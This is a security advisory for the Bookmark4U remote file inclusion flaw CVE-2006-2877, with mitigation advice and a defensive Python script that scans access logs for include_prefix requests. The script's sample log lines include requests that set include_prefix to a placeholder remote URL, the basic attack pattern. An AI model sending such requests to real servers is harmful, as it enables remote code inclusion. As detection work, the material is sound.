Bookmark4U · Bookmark4U · CVE-2006-2877
**Name of the Vulnerable Software and Affected Versions**
Bookmark4U versions 2.0.0 and earlier
**Description**
A remote file inclusion issue allows remote attackers to include arbitrary PHP files via the `include_prefix` parameter in several PHP files, including (1) inc/dbase.php, (2) inc/config.php, (3) inc/common.php, and (4) inc/function.php. However, it has been reported that the inc directory is protected by a .htaccess file, which limits the applicability of this issue to certain environments or configurations.
**Recommendations**
For Bookmark4U versions 2.0.0 and earlier, consider restricting access to the `include_prefix` parameter in the affected PHP files until a patch is available. As a temporary workaround, restrict access to the inc directory by reinforcing the .htaccess file protection or applying alternative access control measures to minimize the risk of exploitation.
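
To check whether the .htaccess protection described above is actually in effect on a given host, the following added example (not part of the original advisory or of Bookmark4U) scans web server access logs for requests that pass `include_prefix` to one of the four affected scripts and reports whether the server refused or served them. It assumes Apache combined log format; the function names and the sample log lines are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# The four scripts and the parameter named in the advisory.
AFFECTED = ("inc/dbase.php", "inc/config.php", "inc/common.php", "inc/function.php")
PARAM = "include_prefix"

# Assumption: Apache combined log format.
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "\S+ (\S+) [^"]*" (\d{3}) ')

def classify(line):
    """Return a finding dict for a request that passes include_prefix to an
    affected script, or None for any other line."""
    m = LOG_RE.match(line)
    if not m:
        return None
    client, target, status = m.groups()
    parts = urlsplit(target)
    script = next((s for s in AFFECTED if parts.path.endswith("/" + s)), None)
    if script is None:
        return None
    # parse_qs percent-decodes, so encoded values are inspected in decoded form.
    values = parse_qs(parts.query, keep_blank_values=True).get(PARAM)
    if values is None:
        return None
    if status == "403":
        outcome = "blocked"   # consistent with the inc/ .htaccess taking effect
    elif status.startswith("2"):
        outcome = "served"    # inc/ is directly reachable on this host
    else:
        outcome = "other"
    return {"client": client, "script": script, "outcome": outcome,
            "remote_value": any("://" in v for v in values)}

def scan(lines):
    """Collect findings from an iterable of log lines."""
    return [f for f in map(classify, lines) if f is not None]

# Constructed sample lines (documentation addresses, .invalid host).
SAMPLE = [
    '198.51.100.7 - - [01/Jun/2006:10:00:00 +0000] "GET /bookmark4u/inc/dbase.php?include_prefix=http%3A%2F%2Fexample.invalid%2F HTTP/1.1" 403 210 "-" "-"',
    '198.51.100.7 - - [01/Jun/2006:10:00:05 +0000] "GET /bookmark4u/inc/config.php?include_prefix=http://example.invalid/ HTTP/1.1" 200 0 "-" "-"',
    '203.0.113.9 - - [01/Jun/2006:10:01:00 +0000] "GET /bookmark4u/index.php?page=1 HTTP/1.1" 200 5120 "-" "-"',
    '203.0.113.9 - - [01/Jun/2006:10:02:00 +0000] "GET /bookmark4u/inc/common.php HTTP/1.1" 403 210 "-" "-"',
]

if __name__ == "__main__":
    for finding in scan(SAMPLE):
        print(finding)
```

A `served` finding means the inc directory is not protected on that host and the workaround above should be applied there. Access logs record only the request line, so values sent outside the query string are not visible to this check.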